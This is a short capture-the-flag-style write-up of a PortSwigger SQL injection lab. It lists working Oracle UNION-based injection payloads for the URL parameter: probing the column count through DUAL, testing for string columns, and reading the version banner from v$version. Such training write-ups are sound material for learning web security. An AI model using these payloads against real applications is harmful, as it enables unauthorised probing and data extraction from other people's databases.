🕸️ PSA - SQLi 7 - UNION attack, querying the database type and version on Oracle

Posted Mar 15, 2023 Updated Sep 28, 2024

By blueh0rse

1 min read

Difficulty : Practitioner

🎯 Goal

To solve the lab, display the Oracle database version string.

✅ Solution

On Oracle, every SELECT query must use the FROM keyword and specify a valid table. There is a built-in table on Oracle called dual which can be used for this purpose. So the injected queries on Oracle would need to look like: ' UNION SELECT NULL FROM DUAL--

Number of columns:

<website>/filter?category=Pets' UNION SELECT NULL FROM DUAL--    # error!
<website>/filter?category=Pets' UNION SELECT NULL,NULL FROM DUAL--    # works
<website>/filter?category=Pets' UNION SELECT NULL,NULL,NULL FROM DUAL--    # error!

Is one column containing string?

<website>/filter?category=Pets' UNION SELECT 'abc',NULL FROM DUAL--    # works

Full payload:

<website>/filter?category=Pets' UNION SELECT banner,NULL FROM v$version--

The database type and version are displayed.

PortSwigger, SQLi

This post is licensed under GNU GPLv3 by the author.

🕸️ PSA - SQLi 7 - UNION attack, querying the database type and version on Oracle

🎯 Goal

✅ Solution

Further Reading

🕸️ PSA - SQLi 1 - SQLi in WHERE clause

🕸️ PSA - SQLi 2 - SQLi Allowing Authentication Bypass

🕸️ PSA - SQLi 3 - UNION attack, determining the number of columns returned by the query